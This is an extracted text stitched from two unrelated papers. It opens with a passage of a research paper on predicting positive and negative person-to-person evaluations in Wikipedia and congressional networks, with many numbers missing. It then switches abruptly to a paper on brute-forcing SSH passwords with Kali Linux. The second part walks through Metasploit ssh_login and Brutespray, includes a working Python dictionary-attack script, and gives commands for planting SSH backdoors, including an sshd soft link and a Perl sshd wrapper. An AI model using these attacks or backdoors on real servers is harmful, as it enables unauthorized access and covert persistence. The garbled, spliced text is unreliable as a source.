, since initial experimentation showed this to perform slightly better than the linear hinge loss. wikipedia experiments our first set of experiments is conducted on the wi- kipedia requests for adminship corpus, which al- lows us to evaluate our model’s ability to predict person-to-person evaluations in web texts that are informal but pertain to important social outcomes. . dataset description for a wikipedia editor to become an administrator, a request for adminship (rfa) must be submitted, either by the candidate or by another community member. subsequently, any wikipedia member may cast a supporting, neutral, or opposing vote. this induces a directed, signed network in which nodes represent wikipedia members and edges represent votes (we discard neutral votes). we crawled and parsed all votes since the adop- tion of the rfa process in through may . this signed network was previously analyzed by leskovec et al. ( b; a). however, there is also a rich textual component that has so far re- mained untapped for edge-sign prediction: each vote is typically accompanied by a short comment (me- dian/mean: / tokens). a typical positive com- ment reads, ‘i’ve no concerns, will make an excel- lent addition to the admin corps’, while an example of a negative comment is, ‘little evidence of collab- oration with other editors and limited content cre- ation.’ the presence of a voting network alongside textual edge features makes our method of sec. well-suited for this dataset. the rfa network contains k nodes, k edges ( % positive), and close to m triangles. . experimental setup train/test sets. we follow the train–test paradigm termed ‘bfs sampling’ in sec. . and fig. , choos- ing random seed nodes, from each of which we perform a breadth-first search (following both in- and out-links) until we have visited nodes. we http://en.wikipedia.org/wiki/wikipedia:rfa data available online (west, ). thus obtain subgraphs with nodes each. we train a model for each subgraph i and test it on sub- graph i + (mod ), ensuring that edges from the training graph are removed from the testing graph. the bfs sampling paradigm was used because the alternative (‘random sampling’ in fig. ) pro- duces subgraphs with mostly isolated edges and only a few triangles—an unrealistic scenario. evaluated models. we evaluate three models: . a standard, text-based sentiment model that treats edges as independent data points; . our full model as specified in sec. . , which combines edge costs based on the predictions of the text-based sentiment model with triangle costs capturing network context; . a version of our model that considers only trian- gle costs, while ignoring the predictions of the text-based sentiment model (akin to the model proposed by bach et al. ( )). we refer to these models as ‘sentiment’, ‘combined’, and ‘network’, respectively. sentiment model. our text-based sentiment model is an l -regularized logistic-regression classifier whose features are term frequencies of the , overall most frequent words. the l -penalty is cho- sen via cross-validation on the training set. since comments often explicitly contain the label (‘sup- port’ or ‘oppose’), we remove all words with pre- fixes ‘support’ or ‘oppos’. we train the model only once, on a random sample of , comments drawn from the set of all k comments (the vast majority of which will not appear in our subgraphs). evidence ratio. regarding the other two models, recall from sec. . 
our definition of the evidence ratio, the fraction of edge signs that are fixed as evi- dence and need not be inferred. in our experiments, we explore the impact of the evidence ratio during training and testing, since we expect performance to increase as more evidence is available. (we use the same evidence ratio for training and testing, but this need not necessarily be so.) metrics. as our principal evaluation metrics, we use the areas under the curve (auc) of the receiver operating characteristic (roc) curve as well as the precision–recall (pr) curves. there are two pr ● ● ● ● evidence ratio a re a u n d e r th e c u rv e . % % % % . . . . . . ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● evidence ratio . % % % % . . . . . ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of evidence ratio (wikipedia), with standard errors. curves, one for the positive class, the other for the negative one. of these two, the positive class is less interesting: due to the class imbalance of % posi- tive edges, even a random guesser would achieve an auc of . . the pr curve of the negative class is more informative: here, it is much harder to achieve high auc, since random guessing yields only . . moreover, the negative edges are arguably more im- portant, not only because they are rarer, but also be- cause they indicate tensions in the network, which we might be interested in detecting and resolving. for these reasons, we report only the auc under the negative pr curve (auc/negpr) here. additionally, we report the area under the roc curve (auc/roc), a standard metric for quantify- ing classification performance on unbalanced data. it captures the probability of a random positive test example receiving a higher score than a random neg- ative one (so guessing gives an auc/roc of . ). . results performance as a function of evidence ratio. the aucs as functions of the evidence ratio are shown in fig. (a). (we emphasize that these plots are not themselves roc and pr curves; rather, they are de- rived from those curves by measuring auc for a range of models, parametrized by evidence ratio.) since we use the same sentiment model in all cases (sec. . ), its performance (yellow) does not depend on the evidence ratio. it is remarkably high, at an auc/roc of . , as a consequence of the highly indicative, sometimes even formulaic, lan- guage used in the comments (examples in sec. . ). the network-only model (blue) works poorly on very little evidence (auc/roc . for . % ev- ● ● ● ● ● ● ● number of dropped features a re a u n d e r th e c u rv e . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● ● ● ● number of dropped features . . . . . ● ● ● ● ● ● ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of number of dropped features (wikipedia), with standard errors. evidence ratio %. idence) but improves steadily as more evidence is used (auc/roc . for % evidence): this is in- tuitive, since more evidence means stronger context for each edge sign to be predicted. although the network-only model works poorly on little evidence, our full model (black), which syn- thesizes the sentiment and network models, is not af- fected by this and effectively defaults to the behavior of the sentiment-only model. furthermore, although the network-only model never attains the perfor- mance of the sentiment-only model, combining the two in our full model (black) nonetheless yields a small performance boost in terms of auc/roc to . for % evidence. 
the gains are signifi- cantly larger when we consider auc/negpr instead of auc/roc: while the sentiment model achieves . , the combined model improves on this by %, to . , at % evidence ratio. performance as a function of sentiment-model quality. it seems hard to improve by much on a sen- timent model that achieves an auc/roc of . on its own; the wikipedia corpus offers an exception- ally explicit linguistic signal. hence, in our next ex- periment, we explore systematically how our model behaves under a less powerful sentiment model. first, we measure, for each feature (i.e., word), how informative it is on its own for predicting the signs of edges (quantified by its mutual information with the edge sign), which induces a ranking of fea- tures in terms of informativeness. now, to make the sentiment model less powerful in a controlled way, we drop the top m features and repeat the experiment described above for a range of m values (where we keep the evidence ratio fixed at %). ● ● ● ● ● ● ● ● ● ● e − e − e + sentiment−model prediction pe n o rm . co st f o r d e vi a tin g f ro m p e . . . . . . . . . . figure : normalized cost λ(i) (defined in sec. . ; log- arithmic scale) for deviating from sentiment-model pre- dictions pe, for bins i = ,..., (wikipedia). upper bin boundaries on the x-axis. values shown are averages over folds. evidence ratio %. fig. shows that the performance of the senti- ment model (yellow) declines drastically as more features are removed. the combined model (black), on the contrary, is much less affected: when the per- formance of the sentiment model drops to that of the network-only (blue; roc/auc . ), the combined model is still stronger than both ( . ). even as the sentiment model approaches random performance, the combined model still never drops below the net- work-only model—it simply learns to disregard the predictions of the sentiment model altogether. learned edge costs. recall from the final part of sec. . that each output pe of the sentiment model falls into one of bins [ , . ],...,[ . , ], with separate edge-cost parameters λ(i) and λ (i) learned for each bucket i. the rationale was to give the model the freedom to trade off edge and triangle costs differently for each edge e, depending on how informative the sentiment model’s prediction pe is. the goal of this section is to understand whether our model indeed exposes such behavior. recall from eq. that λ is the constant with which the ab- solute difference between pe and the inferred edge sign xe is multiplied when xe > pe, while λ is the constant when xe < pe. if pe falls into bin i, the sum λ (i) +λ (i) expresses the cost of deviating from pe in a single number; further, dividing this sum by the sum of all costs (i.e., λ(i) and λ (i) for all bins i, plus the costs d(z) of all triangle types z) yields a normalized edge cost for each bin i, which we call λ(i). fig. plots λ(i) for all bins i = ,..., . we ob- serve that deviating from the sentiment model costs more when it makes a strong prediction (i.e., pe s e n t. l o o l o o + s e n t. . . . . . . random (a) auc/roc s e n t. l o o l o o + s e n t. . . . . . . random (b) auc/negpr figure : performance in a leave-one-out (loo) scenario (wikipedia), with standard errors. for comparison: per- formance of the sentiment model alone. close to or ) than when it makes a non-informa- tive one (e.g., pe ≈ . ). when pe ≈ , nearly % of the total cost is spent to ensure xe ≈ pe, whereas that fraction is only around . % when pe ≈ . . leave-one-out setting. 
our model predicts many missing edge signs simultaneously, using joint infer- ence. another scenario was proposed by leskovec et al. ( a), who predict signs one at a time, as- suming all other edge signs are known. we call this a leave-one-out (‘loo’ for short) setting. assume we want to predict the sign of the edge (u,v) in the loo setting, and that u, v, and w form a triangle. the type of this triangle can be described by the direc- tions and known polarities of the two edges linking u to w, and v to w, respectively. the edge (u,v) may be embedded in several triangles, and the histogram over their types then serves as the feature vector of (u,v) in a logistic regression; as additional features, counts of u’s positive/negative out-links and v’s pos- itive/negative in-links are used. since predictions in the loo setup can draw on the full triangle neighborhood of the edge in ques- tion, we expect it to perform better than the net- work-only model in which edge signs in the triangle neighborhood are often missing. this expectation is confirmed by fig. , which shows that the loo model (gray) achieves an auc/roc (auc/negpr) of . ( . ), with the network-only model (fig. ) at just . ( . ) at % evidence ratio. however, loo is outperformed by our combined model incorporating sentiment information (fig. ), which attains an auc/roc (auc/negpr) of . ( . ). finally, when we add the sentiment predic- tion as another feature to the loo model (‘loo + sent.’ in fig. ), we do best, at . ( . ). to summarize, we make two points: ( ) by com- bining sentiment and network features, our model achieves better performance than a network-only model (loo) that has access to significantly more network information. ( ) incorporating sentiment information helps not only in our setup as described in sec. . , but also in the previously proposed leave-one-out setup (leskovec et al., a). u.s. congress experiments we now evaluate our model in a setting in which the linguistic person-to-person evaluations are less direct and reliable than in the rfa corpus but the signed network is considerably denser. . dataset description the ‘convote’ corpus of congressional speeches (thomas et al., ) consists of , speech seg- ments drawn from debates from the u.s. house of representatives in . there is a mean of . speech segments per debate and . speakers per debate. segments are annotated with the speaker, their party affiliation, the bill discussed, and how the speaker voted on that bill (positive or negative). thomas et al. ( ) and others represent this cor- pus as a bipartite person–item graph with signed edges from congresspeople to the bills (items) they spoke about, and they add additional person–person edges encoding who mentioned whom in the speech segments. we take a different perspective, extract- ing from it a dense, undirected person–person graph by linking two congresspeople if they ever voted on the same bill, labeling the edge as positive if they cast the same vote at least half of the time. we di- rectly use the sentiment model trained by thomas et al. the resulting graph has nodes, , edges ( % positive), and , triangles. . experimental setup we split the network g = (v,e) into folds us- ing the ‘random sampling’ technique described in sec. . and fig. : the set of nodes v is fixed across all folds, and the set of edges e is partitioned ran- domly so that each fold has % of all edges. 
in the full graph, there is one clique per debate, so each fold contains the overlay of several subgraphs, one per debate and each % complete on average. here, random sampling was used because the al- ternative (‘bfs sampling’ in fig. ) would produce nearly complete subgraphs, on which we found the prediction task to be overly easy (since the problem becomes more constrained; sec. . ). we compare the three models also used on the wikipedia dataset (sec. . ). our sentiment model comes right out of the box with the convote cor- pus: thomas et al. ( ) distribute the text-level scores from their svm classifier with the corpus, so we simply work with those, after transforming them into probabilities via logistic regression (a standard technique called platt scaling (platt, )). thus, let qu and qv be the probabilistic sentiment predic- tions for u and v on a given bill. the probability that u and v agree on the bill is quqv + ( −qu)( −qv), and we define the probability pe of a positive sign on the edge e ={u,v} as the average agreement proba- bility over all bills that u and v co-voted on. for instance, the speech containing the sentence, ‘mr. speaker, i do rise today in strong support of h.r. ,’ receives a probability of % of express- ing a positive opinion on h.r. (i.e., house of rep- resentatives) bill , whereas the prediction for the speech containing the words, ‘therefore, i urge my colleagues to vote against both h.r. and h.r. ,’ is only %. hence, the edge between the two respective speakers has a probability of %× %+ %× % = % of being positive. . results fig. summarizes our results. as in the wikipedia experiments, we report aucs as a function of the evidence ratio. the sentiment model alone (yellow) achieves an auc/roc (auc/negpr) of . ( . ), well above the random baselines at . ( . ). the network-only model (blue) performs much worse at the start, but it surpasses the sentiment model even with just . % of the edges as evidence, a reflection of the dense, high-quality network structure with many triangles. when we combine the sentiment and network models (black), we consistently see the best results, with the largest gains in the realistic sce- nario where there is little evidence. eventually, the network-only model catches up to the combined model, simply because it reaches an upper bound on performance given available evi- dence. this owes mainly to the fact that, because we ● ● ● ● ● ● evidence ratio a re a u n d e r th e c u rv e % % . % % % % . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● ● ● evidence ratio % % . % % % % . . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of evidence ratio (convote), with standard errors. derived the person–person signs from person–item signs, only triangles with an even number of nega- tive edges arise with noticeable frequency. to see why, suppose the corpus contained speeches about just one bill. in a triangle consisting of nodes u, v, and w, if u agreed with v and with w, then v and w must agree as well. (the fact that we have multi- ple bills in the corpus opens up the possibility for additional triangle types, but they rarely arise in the data.) this constrains the solution space and makes the problem easier than in the case of wikipedia, where all triangle types are possible. our plots so far have summarized precision–recall curves by measuring auc. here, it is also informa- tive to inspect a concrete pr curve, as in fig. , which shows all the values at % evidence ratio. 
the network-only model (blue) achieves very high precision up to a recall of about . , where there is a sudden drop. the reason is that, according to the above argument about possible triangle types, the model can be very certain about some edges (e.g., because it is the only non-evidence edge in a triangle, making only a single triangle type possible), which causes the plateau for low recall. the combined model matches the precision on the plateau, but also maintains significantly higher precision as the network-only model starts to do more poorly: even if an edge e is not fully determined by surrounding evidence, the sentiment model might still give strong signals for e itself and its neighbors, such that the above reasoning effectively still applies.
[figure : precision/recall (convote, evidence ratio %); panels: (a) positive signs, (b) negative signs.]
discussion
we developed a model that synthesizes textual and social-network information to jointly predict the polarity of person-to-person evaluations, and we assessed this model in two datasets. both involve communal decision making, where people’s attitudes and opinions of each other have profound social consequences, but they are very different. in the wikipedia corpus, the sentiment signal is strong because of established community norms for how to convey one’s opinions, but the network is sparse. in the convote corpus, the network is determined by fully observed voting patterns, making it strong, but the speech texts themselves only indirectly and noisily convey person-to-person opinions. in both cases, our method excels because it is adaptive: it learns from the data how best to combine the two signals. our model’s adaptivity is important for real-world applications, where one is unlikely to know ahead of time which signals are most trustworthy. we envision the following use-case. one extracts a coherent subgraph of the network of interest, perhaps using one of our sampling methods (fig. ), and annotates its edges for their evaluativity. then, in conjunction with a sentiment model (out-of-the-box or specially trained), one trains our combined model and uses it to predict new edge labels in the network. in this setting, the sentiment model might be unreliable, and one might have the time and resources to label only a small fraction of the edges. individually, the network and sentiment models would likely perform poorly; in bringing the two together, our single model of joint inference could still excel.
acknowledgements. this research has been supported in part by nsf iis- , cns- , iis- , iis- ; aro muri; darpa smisc, graphs; onr n - - - ; paypal; docomo; and volkswagen. robert west has been supported by a facebook and a stanford graduate fellowship.
[figure : reduction from two-level spin glass to triangle balance (legend: edge costs −/+; a new vertex v∗ is added).]
a proof sketch of theorem
due to space constraints, we only give a proof sketch here; the full proof is available online (west, ). proof sketch. by reduction from two-level spin glass (tlsg), a problem known to be np-hard (barahona, ). an instance of tlsg consists of vertices v arranged in two 2d grids, one stacked above the other, with edges e between nearest neighbors, and with an edge cost cuv ∈ {−1, 0, +1} associated with each edge {u,v} (see fig. for a small instance). given such an instance, tlsg asks for vertex signs x ∈ {−1, +1}^|v| that minimize the total energy h(x) = −∑{u,v}∈e cuv · xu · xv.
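to make the tlsg objective concrete, the following python sketch evaluates the energy h(x) and minimizes it by exhaustive enumeration over a toy instance; the instance and function names are invented for illustration, and exhaustive search is of course only feasible for tiny graphs, since the problem is np-hard in general.

```python
from itertools import product

def energy(edge_costs, signs):
    """H(x) = - sum over edges {u, v} of c_uv * x_u * x_v."""
    return -sum(c * signs[u] * signs[v] for (u, v), c in edge_costs.items())

def brute_force_tlsg(edge_costs):
    """Exhaustively search vertex signs in {-1, +1}; viable only for tiny instances."""
    nodes = sorted({n for edge in edge_costs for n in edge})
    best = None
    for assignment in product((-1, +1), repeat=len(nodes)):
        signs = dict(zip(nodes, assignment))
        h = energy(edge_costs, signs)
        if best is None or h < best[0]:
            best = (h, signs)
    return best

# toy instance with edge costs in {-1, 0, +1}
toy = {("a", "b"): +1, ("b", "c"): -1, ("a", "c"): +1, ("c", "d"): 0}
print(brute_force_tlsg(toy))
```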
the crucial observation is that tlsg defines ver- tex costs (implicitly all-zero) and edge costs, and asks for vertex signs, whereas triangle balance defines edge costs and triangle costs, and asks for edge signs. that is, vertices (edges) in tlsg corre- spond to edges (triangles) in triangle balance, and our proposed reduction transforms an original tlsg instance into a triangle balance instance in which each edge corresponds to exactly one orig- inal vertex, and each triangle to exactly one original edge. as shown in fig. , which depicts the reduc- tion schematically, this is achieved by introducing a new vertex v∗ that is connected to each original ver- tex and thus creates a triangle for each original edge. the full proof (west, ) shows how the edge and triangle costs can be constructed such that each op- timal solution to the tlsg instance corresponds to an optimal solution to the triangle balance in- stance, and vice versa. references rakesh agrawal, sridhar rajagopalan, ramakrishnan srikant, and yirong xu. . mining newsgroups using networks arising from social behavior. in proceedings of the th international conference on world wide web. pranav anand, marilyn walker, rob abbott, jean e. fox tree, robeson bowmani, and michael minor. . cats rule and dogs drool! classifying stance in online debate. in proceedings of the nd workshop on computational approaches to subjectivity and sen- timent analysis. stephen bach, bert huang, ben london, and lise getoor. . hinge-loss markov random fields: convex inference for structured prediction. in pro- ceedings of the th conference on uncertainty in ar- tificial intelligence. francisco barahona. . on the computational com- plexity of ising spin glass models. journal of physics a: mathematical and general, ( ): – . john blitzer, mark dredze, and fernando pereira. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in proceedings of the th annual meeting of the associ- ation of computational linguistics. stephen boyd, neal parikh, eric chu, borja peleato, and jonathan eckstein. . distributed optimiza- tion and statistical learning via the alternating direc- tion method of multipliers. foundations and trends in machine learning, ( ): – . matthias broecheler, lilyana mihalkova, and lise getoor. . probabilistic similarity logic. in pro- ceedings of the th conference on uncertainty in ar- tificial intelligence. dorwin cartwright and frank harary. . structure balance: a generalization of heider’s theory. psycho- logical review, ( ): – . robin i. dunbar. . gossip in evolutionary perspec- tive. review of general psychology, ( ): – . lisa feldman barrett and james a. russell. . independence and bipolarity in the structure of af- fect. journal of personality and social psychology, ( ): – . fritz heider. . attitudes and cognitive organization. the journal of psychology, ( ): – . xia hu, lei tang, jiliang tang, and huan liu. . ex- ploiting social relations for sentiment analysis in mi- croblogging. in proceedings of the th acm interna- tional conference on web search and data mining. bert huang, angelika kimmig, lise getoor, and jennifer golbeck. . a flexible framework for probabilis- tic models of social trust. in proceedings of the international social computing, behavioral-cultural modeling and prediction conference. dan jurafsky, victor chahuneau, bryan r. routledge, and noah a. smith. . narrative framing of con- sumer sentiment in online restaurant reviews. first monday, ( – ). daphne koller and nir friedman. 
. probabilistic graphical models: principles and techniques. mit press. jérôme kunegis, julia preusse, and felix schwagereit. . what is the added value of negative links in online social networks? in proceedings of the nd international conference on world wide web. jure leskovec, daniel huttenlocher, and jon kleinberg. a. predicting positive and negative links in online social networks. in proceedings of the th interna- tional conference on world wide web. jure leskovec, daniel huttenlocher, and jon kleinberg. b. signed networks in social media. in proceed- ings of the sigchi conference on human factors in computing systems. wei-hao lin, theresa wilson, janyce wiebe, and alexander hauptmann. . which side are you on? identifying perspectives at the document and sentence levels. in proceedings of the th conference on com- putational natural language learning. hao ma, dengyong zhou, chao liu, michael r lyu, and irwin king. . recommender systems with social regularization. in proceedings of the th acm inter- national conference on web search and data mining. robert malouf and tony mullen. . taking sides: user classification for informal online political dis- course. internet research, ( ): – . bo pang and lillian lee. . a sentimental education: sentiment analysis using subjectivity summarization based on minimum cuts. in proceedings of the nd annual meeting of the association for computational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( ): – . john platt. . probabilistic outputs for support vec- tor machines and comparisons to regularized likeli- hood methods. advances in large margin classifiers, ( ): – . marta recasens, cristian danescu-niculescu-mizil, and dan jurafsky. . linguistic models for analyzing and detecting biased language. in proceedings of the st annual meeting of the association for computa- tional linguistics. david c. rubin and jennifer m. talerico. . a com- parison of dimensional models of emotion. memory, ( ): – . james a. russell. . a circumplex model of af- fect. journal of personality and social psychology, ( ): – . swapna somasundaran and janyce wiebe. . recog- nizing stances in ideological on-line debates. in pro- ceedings of the naacl hlt workshop on com- putational approaches to analysis and generation of emotion in text. chenhao tan, lillian lee, jie tang, long jiang, ming zhou, and ping li. . user-level sentiment anal- ysis incorporating social networks. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. jiliang tang, huiji gao, xia hu, and huan liu. . exploiting homophily effect for trust prediction. in proceedings of the th acm international conference on web search and data mining. matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceed- ings of the conference on empirical methods in natural language processing. robert west. . supplementary material. online. http://infolab.stanford.edu/∼west /tacl /. theresa wilson, janyce wiebe, and paul hoffmann. . recognizing contextual polarity in phrase-level sentiment analysis. in proceedings of human lan- guage technology conference and conference on em- pirical methods in natural language processing. tae yano, philip resnik, and noah a. smith. . shedding (a thousand points of) light on biased lan- guage. 
in proceedings of the naacl-hlt workshop on creating speech and language data with ama- zon’s mechanical turk. bei yu, stefan kaufmann, and daniel diermeier. . classifying party affiliation from political speech. journal of information technology and pol- itics, ( ): – . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , violence cracking technology of ssh service based on kali-linux ma limei college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang, in china school of information studies, dominican university, river forest, in usa e-mail: malimei@hebtu.edu.cn zhao dongmei* college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang, in china e-mail: @qq.com gao yijun school of information studies dominican university river forest, in usa e-mail: ygao@dom.edu zhao chen college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang , in china e-mail: tczxz @ .com abstract—in this paper, the current popular ssh password brute force cracking tool is researched, analyzed and summarized. the ssh_login module in metasploit is used to brute force the ssh service to finally obtain the password. the brute spray tool is used to automatically call medusa to blast the service, demonstrating ssh. the process of brute force cracking has certain reference value for penetration attack testing and security defense. keywords-component; violence cracking; technology; ssh service; kali-linux all ssh is an acronym for secure shell, developed by the ietf's network working group, ssh is a security protocol based on the application layer and transport layer. ssh is a protocol that provides security for remote login sessions and other network services. the ssh protocol can effectively prevent information leakage during remote management. ssh was originally a program on a unix system and later quickly expanded to other operating platforms. ssh can make up for vulnerabilities in the network when it is used correctly. the ssh client is available on multiple platforms. ssh can be run on almost all unix platforms—including hp-unix, linux, aix, solaris, digital unix, and others. the kali linux penetration test platform defaults to the ssh service. ssh for remote server management, you only need to know the server's ip address, port, management account and password, you can manage the server, network security follows the principle of wooden barrel, as long as you open a hole through ssh, this will be for infiltrators it is a new world. i. ssh provides two authentication methods. the first is a key-based security verification that relies on a key, which means you have to create a pair of keys for yourself and put the public key on the server you need to access. if you are connecting to an ssh server, the client software will make a request to the server for security verification with your key. after the server receives the request, look for your public key in your home directory on the server and compare it to the public key you sent. if the two keys match, the server encrypts the "challenge" with the public key and sends it to the client software. 
after the client software receives the "challenge", it can decrypt it with your private key and send it to the server. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , the second is password-based security verification, as long as you know your account and password, you can log in to the remote host. all transmitted data will be encrypted, but there is no guarantee that the server you are connecting to is the one you want to connect to. there may be other servers that impersonate the real server, which is attacked by the "middleman". at the same time, if the server has no other security restrictions, such as login source ip, account login error times, there may be violent cracking. however, ssh is not absolutely secure. if you do not restrict the login source ip and do not set the number of attempts to log in, it will be cracked. ii. ssh password brute force application and thoughts a. application  the root permission is obtained through remote command execution such as structs.  get root privileges through web shell authorization  through the local file contains the vulnerability, you can read all the files locally in linux.  obtain the network access authority, which can access the intranet computer.  the ssh port is enabled on the external network (the default or modified port), and ssh access is available. in the previous scenarios, you can get the shadow file and brute force it to get the password of these accounts, but in other scenarios, no loopholes are available. at this time, you need to brute the ssh account. b. thoughts  brute force the root account  use admin as the username to brute force  use the admin dictionary for password cracking  using mastery information to organize social worker information and generate dictionary brute force cracking  comprehensive utilization and recycling of information iii. the specific steps are as follows: a. purpose master the process of brute-breaking the ssh service through the ssh login module in metasploit to finally obtain the password. b. software used guest operating system: kali-linux . , ip address is . . . . server operating system: centos . , address . . . . tool software: metasploit, nmap. c. steps ) load the kali-linux virtual machine, open the kali system terminal, and use nmap to scan the target . . . port. the command is as follows: nmap - v -a -pn . . . , found that open ports, you can try to brute force. the result is shown in figure . figure . nmap scan results parameter description: -v: enable verbose mode; -a: detect the target operating system; -pn: do not ping the target host to reduce the probability of being discovered or blocked by the guard device. ) open another new command line window, type ssh admin@ . . . , enter the password arbitrarily, and the access is blocked. try this process multiple times ( times or more) and find that you can still try to enter the password, the user will not be locked, as shown in figure , so all the conditions that satisfy the brute force vulnerability can be brute force cracked. international journal of advanced network, monitoring and controls volume , no. , figure . trying to log in ) use the ssh_login module in metasploit to crack the crack, open the kali system terminal, and enter msfconsole, as shown in figure . figure . start metasploit ) enter search ssh_login and search for the ssh_login module, as shown in figure . figure . 
searching for the ssh_login module. ) enter use auxiliary/scanner/ssh/ssh_login to load the ssh_login module, as shown in figure . figure . loading the ssh_login module ) enter show options to display the ssh_login module parameters, as shown in figure . figure . ssh_login module parameters. explanation of important parameters: rhost: the target host ip address; pass_file: path of the password dictionary used for the brute force attack; username: the username used for the brute force attack; stop_on_success: stop the brute force attack immediately after the password is cracked. ) set the relevant parameters for the target host, as shown in figure . figure . set the parameters ) enter exploit to start brute force cracking, and successfully obtain the password, which is admin , as shown in figure . figure . execution of the attack ) open a terminal, enter ssh admin@ . . . , and enter the cracked password to log in to the server, as shown in figure . figure . successful login to the server ) enter commands to view server-related information, as shown in figure . figure . executing system commands
iv. use brutespray to crack ssh passwords
brutespray takes the gnmap/xml files produced by an nmap scan and automatically calls medusa to attack the discovered services, which is faster than hydra. brutespray (via medusa) claims to support brute-force account cracking for the ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, svn and vmauthd protocols.
a. installation under kali: brutespray is not integrated into kali linux by default and needs to be installed manually. in some cases kali must be updated first with apt-get update before executing the installation command: apt-get install brutespray. kali linux installs the user and password dictionary files by default under /usr/share/brutespray/wordlist.
b. manual installation: git clone https://github.com/x skysn k/brutespray.git ; cd brutespray ; pip install -r requirements.txt. note that in other environments medusa must also be installed, otherwise brutespray will exit with an error.
c. brutespray parameters. usage: brutespray.py [-h] -f file [-o output] [-s service] [-t threads] [-t hosts] [-u userlist] [-p passlist] [-u username] [-p password] [-c] [-i], i.e. python brutespray.py <options>. option parameters: -h, --help: display help information and exit. -f file, --file file: parse the gnmap or xml file output from nmap. -o output, --output output: directory containing successful attempts. -s service, --service service: specify the service to be attacked. -t threads, --threads threads: specify the number of medusa threads. -t hosts, --hosts hosts: specify the number of hosts tested at the same time. -u userlist, --userlist userlist: user dictionary file. -p passlist, --passlist passlist: password dictionary file. -u username, --username username: specify a single username for the attack. -p password, --password password: specify a single password for the attack. -c, --continuous: continue blasting after a success. -i, --interactive: interactive mode.
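all of these tools ultimately do the same thing: iterate a username/password dictionary against the ssh service and record which combinations authenticate. the following minimal python sketch (using the third-party paramiko library; the host, username, and wordlist path are placeholders) illustrates that core loop for authorized testing of one's own systems; it is an illustration of the idea, not a replacement for the tools above.

```python
import paramiko

def try_ssh_login(host, port, username, password, timeout=5):
    """Return True if the username/password pair authenticates, else False."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=username, password=password,
                       timeout=timeout, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()

def dictionary_attack(host, port, username, wordlist_path):
    """Try each candidate password in the wordlist; stop at the first success."""
    with open(wordlist_path, encoding="utf-8", errors="ignore") as f:
        for line in f:
            candidate = line.strip()
            if candidate and try_ssh_login(host, port, username, candidate):
                return candidate
    return None

# example call (placeholder target and wordlist; test only systems you are authorized to test)
# print(dictionary_attack("192.0.2.10", 22, "admin", "passwords.txt"))
```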
v. violent cracking of ssh passwords
) interactive mode cracking: python brutespray.py --file nmap.xml -i. after execution, the program automatically identifies the services in the nmap scan results; the user chooses the services to be cracked according to the prompts, the number of threads, and the number of hosts attacked simultaneously, and specifies the user and password files. brutespray displays a "success" message on the screen after a credential is cracked.
vi. ssh backdoor
a. soft-link backdoor: ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort= ; the classic backdoor establishes a soft link to sshd directly and then logs in through it with ssh root@x.x.x.x -p <port> using any password. however, this is very weak, and protection scripts such as rootkit hunter can detect it.
b. ssh server wrapper backdoor: ) copy sshd to the bin directory: cd /usr/sbin; mv sshd ../bin ) edit sshd (vi sshd), add the following and save: #!/usr/bin/perl exec "/bin/sh" if (getpeername(STDIN) =~ /^..lf/); exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV; ) fix the permissions: chmod <mode> sshd ) use socat: socat stdio tcp:target_ip:<port>,sourceport=<source_port>. if socat is not installed, it needs to be downloaded and compiled: wget http://www.dest-unreach.org/socat/download/socat-<version>.tar.gz ; tar -zxvf socat-<version>.tar.gz ; cd socat-<version> ; ./configure ; make ; make install ) password-free login using ssh root@target_ip.
vii. ssh public key cryptography
the local computer generates the public and private keys, copies the public key into the ~/.ssh/authorized_keys file on each server that needs to be connected, and sets the corresponding permissions (chmod <mode> ~/.ssh/authorized_keys) to log on to the server without a password.
viii. conclusion
by comparing the ssh brute force tests of the tools hydra, medusa, patator, brutespray and metasploit, the summary is as follows: ) each tool can successfully crack the ssh account and password. ) patator and brutespray are written in python, but brutespray requires medusa support. ) hydra and medusa are written in c and need to be compiled. ) brutespray performs brute forcing based on the results of an nmap scan, which works well after scanning an intranet. ) patator is based on python, fast, and portable; it can be used on windows or linux. ) if kali or pentestbox is available, metasploit is also a reasonable choice for ssh brute force cracking. ) brutespray automatically generates the success log file /brutespray-output/ssh-success.txt; hydra with the parameter "-o save.log" records successful cracks to save.log; medusa with "-o ssh.log" records them to ssh.log; patator can add the parameter "-x ignore:mesg='authentication failed.'" to ignore failed attempts and display only successful ones.
acknowledgment
this project is supported by the national natural science foundation of china (no. ) and by the national natural science youth foundation of china (no. ). author: ma limei, associate professor, hebei normal university, visiting scholar at dominican university (usa); research fields: cyber security, machine learning and artificial neural networks. corresponding author: zhao dongmei, professor, hebei normal university; research fields: cyber security, machine learning, information technology.
references [ ] shen qingni, qingsi. operating system security design. beijing: machinery industry press, . [ ] yu chaohui, wang changzheng, zhao yicheng.
